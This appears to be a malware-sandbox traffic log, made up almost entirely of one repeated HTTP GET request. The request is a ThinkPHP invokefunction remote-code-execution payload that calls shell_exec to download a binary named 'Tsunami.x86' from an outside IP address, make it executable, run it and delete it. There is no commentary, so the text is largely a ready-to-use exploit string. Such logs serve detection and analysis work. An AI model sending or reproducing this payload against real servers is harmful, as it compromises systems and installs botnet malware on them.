    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: Data Raw: Data Ascii:
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
